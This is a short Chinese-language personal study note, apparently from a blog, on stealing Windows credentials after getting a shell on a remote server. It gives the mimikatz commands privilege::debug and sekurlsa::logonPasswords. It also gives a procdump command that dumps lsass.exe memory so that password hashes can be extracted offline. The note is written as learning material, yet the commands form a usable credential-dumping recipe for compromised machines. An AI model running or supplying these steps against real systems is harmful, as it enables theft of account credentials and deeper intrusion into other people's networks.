當我們getshell之後,一般是提權拿下遠端伺服器,剛學習了一個直接讀取遠端伺服器的密碼的工具mimikatz
首先先利用 privilege::debug 提生權限
sekurlsa::logonPasswords就是抓取密碼
這是我本機的,空密碼
另外當無法上傳mimikatz工具到目标伺服器時,可以利用procdump把lsass程序的記憶體檔案導出本地,再在本地利用mimikatz讀取密碼
procdump64.exe -accepteula -ma lsass.exe lsass.dmp 導出為lsass.dump檔案
把lsass.dmp放在mimikatz目錄利用
這樣就讀出了密碼的sha1加密的密碼